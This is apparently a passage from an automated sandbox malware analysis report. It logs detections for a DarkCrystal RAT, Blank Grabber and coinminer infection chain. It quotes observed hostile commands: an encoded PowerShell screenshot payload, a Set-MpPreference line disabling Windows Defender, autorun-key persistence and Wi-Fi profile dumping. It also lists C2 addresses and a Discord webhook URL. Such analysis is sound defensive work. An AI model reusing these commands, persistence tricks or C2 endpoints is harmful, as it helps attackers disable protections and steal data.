Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\svchost.exe, ProcessId: 7268, TargetFilename: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dasHost

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7952, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7440, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ParentProcessId: 7204, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7268, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8076, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-02T00:07:34.734705+0200
SID:	2048095
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO COINMINER XMR CoinMiner Usage - Source IP: 192.168.2.4 - Destination IP: 45.76.89.70

Timestamp:	2024-08-02T00:07:10.415595+0200
SID:	2826930
Source Port:	49740
Destination Port:	443
Protocol:	TCP
Classtype:	Crypto Currency Mining Activity Detected

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-02T00:07:44.902790+0200
SID:	2036289
Source Port:	55707
Destination Port:	53
Protocol:	UDP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-02T00:08:40.967219+0200
SID:	2048130
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\E9LXmGxXsL.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\winlogon.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\svchost.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\setup.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Program Files\Mozilla Firefox\dwm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\powershell.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: based.exe.6900.8.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	ReversingLabs: Detection: 91%
Source: C:\Program Files\Mozilla Firefox\dwm.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\Microsoft\based.exe	ReversingLabs: Detection: 55%
Source: C:\ProgramData\Microsoft\hacn.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\setup.exe	ReversingLabs: Detection: 71%
Source: C:\ProgramData\svchost.exe	ReversingLabs: Detection: 79%
